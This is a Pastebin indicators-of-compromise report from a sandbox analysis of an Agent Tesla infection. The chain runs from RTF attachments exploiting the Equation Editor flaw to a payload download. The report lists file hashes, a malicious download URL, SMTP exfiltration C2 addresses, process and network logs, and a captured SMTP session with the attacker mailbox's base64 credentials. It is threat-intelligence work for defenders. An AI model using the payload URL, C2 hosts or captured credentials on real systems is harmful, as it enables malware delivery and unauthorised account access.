Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #agenttesla #RAT #RTF #11882
- https://pastebin.com/zhJvDz8M
- previous_contact:
- 09/01/19 https://pastebin.com/MdDfZDdb
- 16/10/18 https://pastebin.com/d5DxTRrB
- 04/10/18 https://pastebin.com/JYShuXn4
- 11/10/18 https://pastebin.com/bkCSvJvM
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_agenttesla_111018/
- attack_vector
- --------------
- email attach .DOC (RTF) > EQNED32 > GET 1 URL > AppData\Roaming\*.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979
- File name 10809A007-KOSSEN.doc [Rich Text Format data]
- File size 234.5 KB (240123 bytes)
- SHA-256 dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e
- File name IMPULSE FASHION 7-12ETD VESSEL.doc [Rich Text Format data]
- File size 195.98 KB (200684 bytes)
- SHA-256 6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0
- File name nwamhdk.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 881 KB (902144 bytes)
- activity
- **************
- PL_SCR
- http://alhaji.top/nwama/nwama.exe
- C2 [exfiltration by SMTP]
- 199.79.63.211:587
- 199.79.63.218:587
- netwrk
- --------------
- [http]
- 162.144.128.116 alhaji.top GET /nwama/nwama.exe HTTP/1.1 Mozilla/4.0
- 52.55.255.113 checkip.amazonaws.com GET / HTTP/1.1 no UA
- [587]
- 199.79.63.211:587
- 199.79.63.218:587
- comp
- --------------
- EQNEDT32.EXE 162.144.128.116 80 ESTABLISHED
- nwamhdk.exe 52.55.255.113 80 ESTABLISHED
- nwamhdk.exe 199.79.63.218 587 ESTABLISHED
- nwamhdk.exe 52.55.255.113 80 ESTABLISHED
- [System] 199.79.63.218 587 TIME_WAIT
- [System] 199.79.63.211 587 TIME_WAIT
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- [11882, another context]
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
- C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
- C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
- persist
- --------------
- (!)no persist
- drop
- --------------
- C:\tmp\Temporary Internet Files\Content.IE5\CD4BKOGM\nwama[1].exe
- C:\Users\operator\AppData\Roaming\nwamahjdg368489.exe
- C:\Users\operator\AppData\Roaming\elwmykgc.o2m.zip
- C:\Users\operator\AppData\Roaming\nwamahd\nwamhdk.exe
- C:\tmp\637030277594981562_6f226394-f8e3-4089-a87b-680191fc12a0.db
- SMTP exfiltration fail
- --------------
- 220 us3.outbound.mailhostbox.com ESMTP Postfix
- EHLO APM11
- 250-us3.outbound.mailhostbox.com
- 250-PIPELINING
- 250-SIZE 41648128
- 250-VRFY
- 250-ETRN
- 250-STARTTLS
- 250-AUTH PLAIN LOGIN
- 250-AUTH=PLAIN LOGIN
- 250-ENHANCEDSTATUSCODES
- 250-8BITMIME
- 250 DSN
- AUTH login bndhbWFAbG9ncm9vbS50b3A=
- 334 UGFzc3dvcmQ6
- RnhnRk1BWDY=
- 235 2.7.0 Authentication successful
- MAIL FROM:<nwama@logroom.top>
- 250 2.1.0 Ok
- RCPT TO:<nwama@logroom.top>
- 550 5.4.6 <nwama@logroom.top>: Recipient address rejected: Email Sending Quota Exceeded
- # # #
- https://www.virustotal.com/gui/file/7a1ad06997a8e82d1074ee61523b3203b57aa0c4e130c4f5366fc9e7d7738979/details
- https://www.virustotal.com/gui/file/dde7c0ace711bce1edf7d87b761cdbfb3fc4be3e1d3736f222daece4d1abe08e/details
- https://www.virustotal.com/gui/file/6f69d71d71878bd9406fb5fc4330fe3e14037ba5fdff85ff48b36619efe4a0f0/details
- https://analyze.intezer.com/#/analyses/f0570463-452b-42bc-99b7-2f18ade21a17
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement